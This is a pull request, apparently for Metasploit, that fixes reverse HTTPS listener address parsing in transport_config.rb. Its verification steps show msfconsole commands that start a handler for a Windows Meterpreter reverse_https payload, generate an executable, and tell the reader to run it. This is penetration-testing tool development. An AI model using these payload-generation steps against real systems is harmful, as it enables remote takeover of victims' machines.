### PR TITLE
Fix #9827 - reverse HTTPS listeners

### DIFF
--- a/lib/msf/core/payload/transport_config.rb
+++ b/lib/msf/core/payload/transport_config.rb
@@ -51,9 +51,16 @@ module Msf::Payload::TransportConfig
 
   def transport_uri_components(opts={})
     ds = opts[:datastore] || datastore
-    scheme = opts[:scheme]
-    lhost = ds['LHOST']
-    lport = ds['LPORT']
+    if opts[:url]
+      u = URI(opts[:url])
+      scheme = u.scheme
+      lhost = u.host
+      lport = u.port
+    else
+      scheme = opts[:scheme]
+      lhost = ds['LHOST']
+      lport = ds['LPORT']
+    end
     if ds['OverrideRequestHost']
       scheme = ds['OverrideScheme'] || scheme
       lhost = ds['OverrideLHOST'] || lhost


### PR DESCRIPTION
Fixes #9827

## Verification

List the steps needed to make sure this thing works

```
msf5 > use payload/windows/x64/meterpreter/reverse_https
msf5 payload(windows/x64/meterpreter/reverse_https) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf5 payload(windows/x64/meterpreter/reverse_https) > to_handler 
[*] Payload Handler Started as Job 0
msf5 payload(windows/x64/meterpreter/reverse_https) > 
[*] Started HTTPS reverse handler on https://0.0.0.0:8443
msf5 payload(windows/x64/meterpreter/reverse_https) > set LHOST your.ip
msf5 payload(windows/x64/meterpreter/reverse_https) > generate -t exe -f /tmp/runthis.exe
[*] Writing 7168 bytes to /tmp/runthis.exe...
```
then run it
